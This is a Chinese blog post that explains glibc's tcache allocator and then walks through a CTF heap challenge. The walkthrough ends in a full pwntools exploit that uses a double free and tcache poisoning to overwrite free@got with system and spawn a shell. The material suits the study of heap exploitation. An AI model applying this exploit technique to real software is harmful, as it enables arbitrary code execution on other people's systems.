tcache.md

tcache作为libc2.26新加的机制,优先级高于fastbin,在提升速度的同时及完美的诠释了要速度就牺牲安全性这一定则。可以在这里找到当时新更新的代码。

代码分析

tcache(thread local caching),作为一个优先级高于fastbin新的缓存cache,相比fastbin是提升了不少的性能,但与此同时,带来的副作用就是比fastbin更好利用。我们可以看看更新的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
* config.make.in: Enable experimental malloc option.
* configure.ac: Likewise.
* configure: Regenerate.
* manual/install.texi: Document it.
* INSTALL: Regenerate.
* malloc/Makefile: Likewise.
* malloc/malloc.c: Add per-thread cache (tcache).
(tcache_put): New.
(tcache_get): New.
(tcache_thread_freeres): New.
(tcache_init): New.
(__libc_malloc): Use cached chunks if available.
(__libc_free): Initialize tcache if needed.
(__libc_realloc): Likewise.
(__libc_calloc): Likewise.
(_int_malloc): Prefill tcache when appropriate.
(_int_free): Likewise.
(do_set_tcache_max): New.
(do_set_tcache_count): New.
(do_set_tcache_unsorted_limit): New.
* manual/probes.texi: Document new probes.
* malloc/arena.c: Add new tcache tunables.
* elf/dl-tunables.list: Likewise.
* manual/tunables.texi: Document them.
* NEWS: Mention the per-thread cache.

这里我们直接看malloc.c所加的代码

malloc.c

定义

先看下最前面所定义的东西:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
1 +#if USE_TCACHE
2 +/* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */
3 +# define TCACHE_MAX_BINS 64
4 +# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)
5 +
6 +/* Only used to pre-fill the tunables. */
7 +# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
8 +
9 +/* When "x" is from chunksize(). */
10 +# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
11 +/* When "x" is a user-provided size. */
12 +# define usize2tidx(x) csize2tidx (request2size (x))
13 +
14 +/* With rounding and alignment, the bins are...
15 + idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
16 + idx 1 bytes 25..40 or 13..20
17 + idx 2 bytes 41..56 or 21..28
18 + etc. */

19 +
20 +/* This is another arbitrary limit, which tunables can change. Each
21 + tcache bin will hold at most this number of chunks. */

22 +# define TCACHE_FILL_COUNT 7
23 +#endif
+
  • 可以看到规定tcache最多由64个Bins链接而成(第三行),而每一个bins里最多存放7个chunk(第21行)
  • 64位机中最小size是24字节,每16字节递增一次,而32位机上为12字节,每8字节递增一次.(15-17行)

结构体

在tcache机制中新增了两个新的结构体:tcahce_entry和tcache_perthread_struct,两个结构体的定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
+/* We overlay this structure on the user-data portion of a chunk when
+ the chunk is stored in the per-thread cache. */

+typedef struct tcache_entry
+{

+ struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+ per-thread cache (hence "tcache_perthread_struct"). Keeping
+ overall size low is mildly important. Note that COUNTS and ENTRIES
+ are redundant (we could have just counted the linked list each
+ time), this is for performance reasons. */

+typedef struct tcache_perthread_struct
+{

+ char counts[TCACHE_MAX_BINS];
+ tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread char tcache_shutting_down = 0;
+static __thread tcache_perthread_struct *tcache = NULL;

  • 可以看到tcache_entry为单链表结构
  • 而tcache_perthread_struct为tcahch机制的主体
    1. 一个链表中内存块的最大数量为TCACHE_MAX_BINS即64;
    2. 不同大小的单链表(64)

两个新定义的函数(tcache_get 和tcache_put)

这两个函数被用于在链表中取出和插入chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
+/* Caller must ensure that we know tc_idx is valid and there's room
+ for more chunks. */
+static void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+ tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+ assert (tc_idx < TCACHE_MAX_BINS);
+ e->next = tcache->entries[tc_idx];
+ tcache->entries[tc_idx] = e;
+ ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+ available chunks to remove. */
+static void *
+tcache_get (size_t tc_idx)
+{
+ tcache_entry *e = tcache->entries[tc_idx];
+ assert (tc_idx < TCACHE_MAX_BINS);
+ assert (tcache->entries[tc_idx] > 0);
+ tcache->entries[tc_idx] = e->next;
+ --(tcache->counts[tc_idx]);
+ return (void *) e;
+}
+

可以看到开发者希望我们确信参数是合法的,但安全性而言,这完全是放开了检查机制,摒弃了安全性而只追求速度

tcache_thread_freeres

用于清空当前线程的tcache

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
+
+static void __attribute__ ((section ("__libc_thread_freeres_fn")))
+tcache_thread_freeres (void)
+{
+ int i;
+ tcache_perthread_struct *tcache_tmp = tcache;
+
+ if (!tcache)
+ return;
+
+ tcache = NULL;
+
+ for (i = 0; i < TCACHE_MAX_BINS; ++i)
+ {
+ while (tcache_tmp->entries[i])
+ {
+ tcache_entry *e = tcache_tmp->entries[i];
+ tcache_tmp->entries[i] = e->next;
+ __libc_free (e);
+ }
+ }
+
+ __libc_free (tcache_tmp);
+
+ tcache_shutting_down = 1;
+}
+text_set_element (__libc_thread_subfreeres, tcache_thread_freeres);
+

tcache_init_

初始化函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
+static void
+tcache_init(void)
+{
+ mstate ar_ptr;
+ void *victim = 0;
+ const size_t bytes = sizeof (tcache_perthread_struct);
+
+ if (tcache_shutting_down)
+ return;
+
+ arena_get (ar_ptr, bytes);
+ victim = _int_malloc (ar_ptr, bytes);
+ if (!victim && ar_ptr != NULL)
+ {
+ ar_ptr = arena_get_retry (ar_ptr, bytes);
+ victim = _int_malloc (ar_ptr, bytes);
+ }
+
+
+ if (ar_ptr != NULL)
+ __libc_lock_unlock (ar_ptr->mutex);
+
+ /* In a low memory situation, we may not be able to allocate memory
+ - in which case, we just keep trying later. However, we
+ typically do this very early, so either there is sufficient
+ memory, or there isn't enough memory to do non-trivial
+ allocations anyway. */
+ if (victim)
+ {
+ tcache = (tcache_perthread_struct *) victim;
+ memset (tcache, 0, sizeof (tcache_perthread_struct));
+ }
+
+}

可以看到tcache的内存块是由_int_malloc_生成的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
+#if USE_TCACHE
+ /* int_free also calls request2size, be careful to not pad twice. */
+ size_t tbytes = request2size (bytes);
+ size_t tc_idx = csize2tidx (tbytes);
+
+ MAYBE_INIT_TCACHE ();
+
+ DIAG_PUSH_NEEDS_COMMENT;
+ if (tc_idx < mp_.tcache_bins
+ /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+ && tcache
+ && tcache->entries[tc_idx] != NULL)
+ {
+ return tcache_get (tc_idx);
+ }
+ DIAG_POP_NEEDS_COMMENT;
+#endif

这里主要检查了tcache和tcahce_list是否为空和参数是否越界的问题
如果没有问题就调用tcache_get函数

_int_malloc

而_int_malloc函数中是这么写的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
+#if USE_TCACHE
+ /* While we're here, if we see other chunks of the same size,
+ stash them in the tcache. */
+ size_t tc_idx = csize2tidx (nb);
+ if (tcache && tc_idx < mp_.tcache_bins)
+ {
+ mchunkptr tc_victim;
+
+ /* While bin not empty and tcache not full, copy chunks over. */
+ while (tcache->counts[tc_idx] < mp_.tcache_count
+ && (pp = *fb) != NULL)
+ {
+ REMOVE_FB (fb, tc_victim, pp);
+ if (tc_victim != 0)
+ {
+ tcache_put (tc_victim, tc_idx);
+ }
+ }
+ }
+#endif

_init_free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
+#if USE_TCACHE
+ {
+ size_t tc_idx = csize2tidx (size);
+
+ if (tcache
+ && tc_idx < mp_.tcache_bins
+ && tcache->counts[tc_idx] < mp_.tcache_count)
+ {
+ tcache_put (p, tc_idx);
+ return;
+ }
+ }
+#endif
+

先判断参数合法,相同大小chunk的数量在7个以内时,就进入 tcache_put()进行释放

总结

  • tcache的优先级是最高的,在满足tcache所需size的chunk中,free后一定是先进入tcache的
  • 由于删减了一些检查机制,从而使得安全性急剧下降

利用姿势

这里引用ex师傅的一道题,顺便安利一下EX师傅的博客

mian函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+4h] [rbp-Ch]
unsigned __int64 v5; // [rsp+8h] [rbp-8h]

v5 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
alarm(0x3Cu);
puts("Welcome!");
do
{
puts(menu);
__isoc99_scanf("%d", &v4);
switch ( (unsigned int)off_400E38 )
{
case 1u:
add();
break;
case 2u:
delete();
break;
case 3u:
edit();
break;
case 4u:
show();
break;
case 5u:
break;
default:
puts("Invalid option!");
break;
}
}
while ( v4 != 5 );
puts("Bye!");
return 0;
}

可以看到这是一道常见的菜单题目,一共有四个功能,分别是添加,删除,修改,打印,然后跟进四个函数

add()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
unsigned __int64 add()
{
int v1; // [rsp+Ch] [rbp-14h]
unsigned int i; // [rsp+10h] [rbp-10h]
unsigned int v3; // [rsp+14h] [rbp-Ch]
unsigned __int64 v4; // [rsp+18h] [rbp-8h]

v4 = __readfsqword(0x28u);
v3 = -1;
for ( i = 0; i <= 0xF; ++i )
{
if ( !ptr[i] )
{
v3 = i;
break;
}
}
if ( v3 == -1 )
{
puts("Error: Don't have enough space!");
}
else
{
puts("What size do you want?");
__isoc99_scanf("%d", &v1);
ptr[v3] = malloc(v1);
printf("Success! The index is %d .\n", v3);
}
return __readfsqword(0x28u) ^ v4;
}

从add函数中可以看出,我们可以自己控制chunk的大小,与此同时还限定了最多分配16个chunk

delete

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unsigned __int64 delete()
{
unsigned int v1; // [rsp+4h] [rbp-Ch]
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("Which one do you want to delete?");
__isoc99_scanf("%d", &v1);
if ( (v1 & 0x80000000) == 0 && v1 <= 0xF && ptr[v1] )
{
free((void *)ptr[v1]);
puts("Success!");
}
else
{
puts("Error: Invalid index!\n");
}
return __readfsqword(0x28u) ^ v2;
}

这里可以看到漏洞点,free指针后没有清零

edit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned __int64 edit()
{
unsigned int v1; // [rsp+0h] [rbp-10h]
int v2; // [rsp+4h] [rbp-Ch]
unsigned __int64 v3; // [rsp+8h] [rbp-8h]

v3 = __readfsqword(0x28u);
puts("Which one do you want to modify?");
__isoc99_scanf("%d", &v1);
if ( (v1 & 0x80000000) == 0 && v1 <= 0xF && ptr[v1] )
{
puts("What size is the point?");
__isoc99_scanf("%d", &v2);
read(0, (void *)ptr[v1], v2);
puts("Success!");
}
else
{
puts("Error: Invalid index!\n");
}
return __readfsqword(0x28u) ^ v3;
}

edit函数可以方便我们进行漏洞利用从而进行任意地址malloc

show

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unsigned __int64 show()
{
unsigned int v1; // [rsp+4h] [rbp-Ch]
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("Which one do you want to see?");
__isoc99_scanf("%d", &v1);
if ( (v1 & 0x80000000) == 0 && v1 <= 0xF && ptr[v1] )
{
puts((const char *)ptr[v1]);
puts("Success!");
}
else
{
puts("Error: Invalid index!\n");
}
return __readfsqword(0x28u) ^ v2;
}

show函数方便我们进行地址泄露

## 利用分析

下面的内容就很明了了,但首先我们先抛开如何解这道题,我们先来看看tcache的一些小机制

tcache机制

先用gdb加载程序,然后在main函数处下断点

1
2
3
4
nightrain@root-pwn-me:~/pwn/tcache/tcache$ gdb ./tcache
pwndbg> b main
Breakpoint 1 at 0x400b2b
pwndbg>

好了,然后让我们把程序跑起来,我们先分配两个大小为32的堆块然后按照0,1的顺序free掉他们
也就是add两次,free两次

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
pwndbg> heap
0x603000 PREV_INUSE {
mchunk_prev_size = 0,
mchunk_size = 593,
fd = 0x0,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
0x603250 FASTBIN {
mchunk_prev_size = 0,
mchunk_size = 49,
fd = 0x0,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
0x603280 FASTBIN {
mchunk_prev_size = 0,
mchunk_size = 49,
fd = 0x0,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}
0x6032b0 PREV_INUSE {
mchunk_prev_size = 0,
mchunk_size = 134481,
fd = 0x0,
bk = 0x0,
fd_nextsize = 0x0,
bk_nextsize = 0x0
}

此时堆块如上,可以看到我们get了两个大小为49的chunk,为什么是49呢,因为是64位,要和16对齐,而因为我们申请的大小为32,此时size+8为40,向16位对齐为48,再加上1位标志位,就成了49,地址内容如下:

1
2
3
4
5
6
7
8
9
pwndbg> x/32 0x603250
0x603250: 0x00000000 0x00000000 0x00000031 0x00000000
0x603260: 0x00000000 0x00000000 0x00000000 0x00000000
0x603270: 0x00000000 0x00000000 0x00000000 0x00000000
0x603280: 0x00000000 0x00000000 0x00000031 0x00000000
0x603290: 0x00603260 0x00000000 0x00000000 0x00000000
0x6032a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x6032b0: 0x00000000 0x00000000 0x00020d51 0x00000000
0x6032c0: 0x00000000 0x00000000 0x00000000 0x00000000

然后我们依次free掉这两个chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> bins
tcachebins
0x30 [ 2]
: 0x603290 —▸ 0x603260 ◂— 0x0
fastbins
0x20
: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all
: 0x0
smallbins
empty
largebins
empty

我们就得到了两个tcache chunk,其中不难看出0x603260为第0个chunk,然后我们再申请一次大小为32的chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> bins
tcachebins
0x30 [ 1]
: 0x603260 ◂— 0x0
fastbins
0x20
: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all
: 0x0
smallbins
empty
largebins
empty

这里可以看到我们将第1个tcache先拿出去了,这里就是tcache的一个小机制了,tcache是先进后出

tcache的一些小利用例子

为了避免造轮子,大家可以直接看ctf-wiki

本题解法

上面列举了一小点tcache的机制,下面开始对本题进行求解
本题我采用修改free@got为system函数来进行求解,当然,泄露libc基址的办法有很多,我们可以申请unsorted bin来泄露,而因为本题使用了tcache机制,因此我们采用double free的方式进行泄露
这里我们先写了菜单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def add(size):
p.sendlineafter('Your choice?','1')
p.sendlineafter('What size do you want?',str(size))

def edit(num,size,buf):
p.sendlineafter('Your choice?','3')
log.success('[*]choice3')
p.sendlineafter('Which one do you want to modify?',str(num))
log.success('[*]str')
p.sendlineafter('What size is the point?',str(size))
log.success('[*]256')
p.send(buf)

def show(num):
p.sendlineafter('Your choice?','4')
p.sendlineafter('Which one do you want to see?',str(num))

def dele(num):
p.sendlineafter('Your choice?','2')
p.sendlineafter('Which one do you want to delete?',str(num))

然后我们利用double free来进行libc的泄露
步骤如下:add(24) -> dele(0) -> dele(0) -> add(24) -> add(24) -> show(2)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> bins
tcachebins
0x20 [ 1]
: 0x602018 (_GLOBAL_OFFSET_TABLE_+24) —▸ 0x7fab79c65950 (free) ◂— ...
fastbins
0x20
: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all
: 0x0
smallbins
empty
largebins
empty

在dele后我停了一下,此时tcache的next指针已经指向了free函数,我们只需要再申请两次chunk然后直接进行打印就可以得到free的地址,然后减去free@got的地址就可以直接得到libc的基址
此时我们可以提前把id为1的chunk块内容改成/bin/sh,最后只要把free函数改成system函数,然后dele(1)就可以get shell了,exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
from pwn import *

context.word_size = 64
context.os = "linux"
context.arch = "amd64"
#context.log_level="debug"
p=process('./tcache')
#p=remote('eonew.cn', 60109)
elf=ELF('./tcache')
libc=ELF('./libc-2.27.so')

try:
f = open('pid', 'w')
f.write(str(proc.pidof(p)[0]))
f.close()
except Exception as e:
print(e)

def add(size):
p.sendlineafter('Your choice?','1')
p.sendlineafter('What size do you want?',str(size))

def edit(num,size,buf):
p.sendlineafter('Your choice?','3')
log.success('[*]choice3')
p.sendlineafter('Which one do you want to modify?',str(num))
log.success('[*]str')
p.sendlineafter('What size is the point?',str(size))
log.success('[*]256')
p.send(buf)

def show(num):
p.sendlineafter('Your choice?','4')
p.sendlineafter('Which one do you want to see?',str(num))

def dele(num):
p.sendlineafter('Your choice?','2')
p.sendlineafter('Which one do you want to delete?',str(num))


#pause()
#gdb.attach(p)
add(24)
dele(0)
dele(0)
#pause()
edit(0,24,p64(elf.got['free']))
add(24)
#pause()
edit(1,24,'/bin/sh\0')
#pause()
add(24)
show(2)
p.recvuntil('\n')
result=u64(p.recvuntil('\n')[:-1].ljust(8,chr(0)))
libc_base=result-libc.symbols['free']
log.success('[*]libc_free:'+hex(result))
log.success('[*]libc_base:'+hex(libc_base))
sys_addr=libc_base+libc.symbols['system']
log.success('[*]system:'+hex(sys_addr))
edit(2,24,p64(sys_addr))
sleep(1)
dele(1)
p.interactive()
os.system("rm -f pid")

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!